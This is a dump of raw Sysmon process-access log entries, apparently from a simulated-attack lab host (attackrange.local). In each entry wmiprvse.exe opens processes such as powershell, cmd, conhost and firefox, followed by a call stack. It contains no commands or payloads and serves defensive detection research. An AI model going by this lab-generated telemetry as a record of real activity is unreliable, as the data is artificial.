22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6945-603D-5987-00000000AD01}1516C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.755{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D27D-00000000AD01}2752C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7B-603D-D17D-00000000AD01}4500C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-1E7A-603D-D07D-00000000AD01}5796C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 